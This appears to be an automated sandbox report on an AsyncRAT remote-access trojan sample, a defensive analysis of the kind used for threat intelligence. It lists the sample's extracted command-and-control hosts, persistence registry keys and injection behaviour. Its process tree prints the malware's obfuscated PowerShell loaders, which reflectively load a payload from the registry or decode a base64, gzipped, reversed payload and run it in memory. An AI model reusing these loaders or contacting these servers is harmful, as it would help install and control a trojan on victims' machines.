asyncrat | cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7

Analysis

max time kernel
150s
max time network
148s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
06-08-2024 15:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b770d62550d8ff48c7fd45dd04d790f2.exe
Size

1.7MB
MD5

b770d62550d8ff48c7fd45dd04d790f2
SHA1

3c4747ad182898466a9314e536fda1fe5983db42
SHA256

cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7
SHA512

602a3f853fad15269234257501386a12d8992b0390ae8f2808c2f31ab56c75746cde5b913843fa82277fbe6837a1eb0feb7df636d1bc6026d359f578e5154413
SSDEEP

49152:cKJU9ltTMMRYpY4TJtqjv7KtGQdHyedH7:zi5TMM+Dg7K0WHj7

Score

10^/10

asyncrat o7lab discovery evasion execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

o7lab

154.216.20.242:5000

gia.o7lab.me:5000

Mutex

GpMiIzUX7KoW

Attributes

delay
3
install
false
install_file
$77svchost.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

blue.o7lab.me:7777

server.underground-cheat.xyz:7777

Mutex

dtDtRWyW1m1g

Attributes

delay
3
install
false
install_file
$77WinUpdate.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2520 created 420	2520	powershell.EXE	5

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
6124	attrib.exe

Executes dropped EXE 3 IoCs

pid	Process
4800	adns.exe
6140	yabeql.cmd.Jla
3552	stqhww.exe

Loads dropped DLL 3 IoCs

pid	Process
2488	b770d62550d8ff48c7fd45dd04d790f2.exe
6056	cmd.exe
4644	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Taskhostw = "C:\\Users\\Admin\\AppData\\Local\\Taskhostw.exe"	b770d62550d8ff48c7fd45dd04d790f2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Okqpfkqo = "C:\\Users\\Admin\\AppData\\Local\\Okqpfkqo.exe"	adns.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
5992	powershell.exe
4644	powershell.exe
2520	powershell.EXE

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2488 set thread context of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 set thread context of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 set thread context of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 4800 set thread context of 5488	4800	adns.exe	42
PID 2520 set thread context of 2856	2520	powershell.EXE	62

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	yabeql.cmd.Jla
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b770d62550d8ff48c7fd45dd04d790f2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stqhww.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yabeql.cmd.Jla
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adns.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1364	ipconfig.exe
5296	ipconfig.exe
5596	ipconfig.exe
4692	ipconfig.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 101b38f217e8da01	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2488	b770d62550d8ff48c7fd45dd04d790f2.exe
2488	b770d62550d8ff48c7fd45dd04d790f2.exe
2488	b770d62550d8ff48c7fd45dd04d790f2.exe
2488	b770d62550d8ff48c7fd45dd04d790f2.exe
2488	b770d62550d8ff48c7fd45dd04d790f2.exe
4800	adns.exe
5488	InstallUtil.exe
5992	powershell.exe
5992	powershell.exe
5992	powershell.exe
6140	yabeql.cmd.Jla
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
5488	InstallUtil.exe
2520	powershell.EXE
2520	powershell.EXE
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe
2856	dllhost.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2488	b770d62550d8ff48c7fd45dd04d790f2.exe
Token: SeDebugPrivilege	2488	b770d62550d8ff48c7fd45dd04d790f2.exe
Token: SeDebugPrivilege	4800	adns.exe
Token: SeDebugPrivilege	4956	InstallUtil.exe
Token: SeDebugPrivilege	4800	adns.exe
Token: SeDebugPrivilege	5488	InstallUtil.exe
Token: SeDebugPrivilege	5992	powershell.exe
Token: SeDebugPrivilege	6140	yabeql.cmd.Jla
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	2520	powershell.EXE
Token: SeDebugPrivilege	2520	powershell.EXE
Token: SeDebugPrivilege	2856	dllhost.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2488 wrote to memory of 4668	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	29
PID 2488 wrote to memory of 4668	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	29
PID 2488 wrote to memory of 4668	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	29
PID 2488 wrote to memory of 4668	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	29
PID 4668 wrote to memory of 4692	4668	cmd.exe	31
PID 4668 wrote to memory of 4692	4668	cmd.exe	31
PID 4668 wrote to memory of 4692	4668	cmd.exe	31
PID 4668 wrote to memory of 4692	4668	cmd.exe	31
PID 2488 wrote to memory of 4800	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	32
PID 2488 wrote to memory of 4800	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	32
PID 2488 wrote to memory of 4800	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	32
PID 2488 wrote to memory of 4800	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	32
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4852	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	33
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4908	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	34
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 4956	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	35
PID 2488 wrote to memory of 5044	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	36
PID 2488 wrote to memory of 5044	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	36
PID 2488 wrote to memory of 5044	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	36
PID 2488 wrote to memory of 5044	2488	b770d62550d8ff48c7fd45dd04d790f2.exe	36
PID 5044 wrote to memory of 1364	5044	cmd.exe	38
PID 5044 wrote to memory of 1364	5044	cmd.exe	38
PID 5044 wrote to memory of 1364	5044	cmd.exe	38
PID 5044 wrote to memory of 1364	5044	cmd.exe	38
PID 4800 wrote to memory of 5256	4800	adns.exe	39
PID 4800 wrote to memory of 5256	4800	adns.exe	39
PID 4800 wrote to memory of 5256	4800	adns.exe	39
PID 4800 wrote to memory of 5256	4800	adns.exe	39
PID 5256 wrote to memory of 5296	5256	cmd.exe	41
PID 5256 wrote to memory of 5296	5256	cmd.exe	41
PID 5256 wrote to memory of 5296	5256	cmd.exe	41
PID 5256 wrote to memory of 5296	5256	cmd.exe	41

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6124	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{09942a37-513a-44e0-90fa-7f8528f0279a}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2856

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:604
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1728
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:3056
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    PID:4596
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:680
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  PID:744
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:820
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1180
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  PID:860
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {3A583892-09DB-488F-995A-37BD5226B97A} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    PID:3712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+'7'+'s'+'t'+'a'+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2520
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:1000
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:324
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:916
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1076
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1124
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:1604
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:1740

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1208
- C:\Users\Admin\AppData\Local\Temp\b770d62550d8ff48c7fd45dd04d790f2.exe
  "C:\Users\Admin\AppData\Local\Temp\b770d62550d8ff48c7fd45dd04d790f2.exe"
  2⤵
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ipconfig /release
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4668
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /release
      4⤵
      System Location Discovery: System Language Discovery
      Gathers network information
      PID:4692
- - C:\Users\Admin\AppData\Local\Temp\adns.exe
    "C:\Users\Admin\AppData\Local\Temp\adns.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4800
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /release
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5256
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        5⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:5296
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5488
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\yabeql.cmd"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5968
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\yabeql.cmd"'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5992
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\yabeql.cmd" "
        7⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:6056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6092
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\yabeql.cmd.Jla
        8⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:6104
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h C:\Users\Admin\AppData\Local\Temp\yabeql.cmd.Jla
        8⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:6124
        
        C:\Users\Admin\AppData\Local\Temp\yabeql.cmd.Jla
        
        C:\Users\Admin\AppData\Local\Temp\yabeql.cmd.Jla -WindowStyle hidden -command "$Fywwr = get-content 'C:\Users\Admin\AppData\Local\Temp\yabeql.cmd' | Select-Object -Last 1; $Oidbnh = [System.Convert]::FromBase64String($Fywwr);$Gpldsatvv = New-Object System.IO.MemoryStream( , $Oidbnh );$Vhfdab = New-Object System.IO.MemoryStream;$Phmdkmi = New-Object System.IO.Compression.GzipStream $Gpldsatvv, ([IO.Compression.CompressionMode]::Decompress);$Phmdkmi.CopyTo( $Vhfdab );$Phmdkmi.Close();$Gpldsatvv.Close();[byte[]] $Oidbnh = $Vhfdab.ToArray();[Array]::Reverse($Oidbnh); $Jcglv = [System.Threading.Thread]::GetDomain().Load($Oidbnh); $Jfbubqgvmqz = $Jcglv.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Jfbubqgvmqz.DeclaringType, $Jfbubqgvmqz.Name).DynamicInvoke() | Out-Null"
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6140
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\stqhww.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4248
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\stqhww.exe"'
        6⤵
        Loads dropped DLL
        Command and Scripting Interpreter: PowerShell
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\stqhww.exe
        
        "C:\Users\Admin\AppData\Local\Temp\stqhww.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3552
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /renew
      4⤵
      System Location Discovery: System Language Discovery
      PID:5548
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        5⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:5596
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:4852
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:4908
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4956
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ipconfig /renew
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /renew
      4⤵
      System Location Discovery: System Language Discovery
      Gathers network information
      PID:1364

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15949922281650376019-741613143828951378170452345-12121883841893166484-1197731794"
1⤵
PID:2600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9e8afa6cbb4a995e36c725226f429a55

SHA1
37dfd214a7a671b452ffc903bac6c48742202c4b

SHA256
54badaa214046683612c63e181c5724538e365a1ca7cd02e3964c1c5ee18cc93

SHA512
4f1344031b46139fd3acb2582d517d31a6be298335d97bf83c2b113f69ea93c8c2bd4dbd2560e4ac7cc339ae6210f68d364cb5d3517031e962eb36b85d68eb48

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabB473.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1EE7.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\adns.exe

Filesize
885KB

MD5
3293e76bde33e374df998dc83874f03b

SHA1
44a13df0874936715bbb6ec9bb698bedc268c7e9

SHA256
4874508b4662cdbe145b4c70f86c70c7ce3237730098e41a67f2a961bd048953

SHA512
f37a23cadbb30996a3f2a56babd9b513c53134546f5976941e33b3b635a290e3fd5313657db249309dba97993ade6712f6a7c4a6f0f93df10f14b80e7f3662f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\stqhww.exe

Filesize
163KB

MD5
1a7d1b5d24ba30c4d3d5502295ab5e89

SHA1
2d5e69cf335605ba0a61f0bbecbea6fc06a42563

SHA256
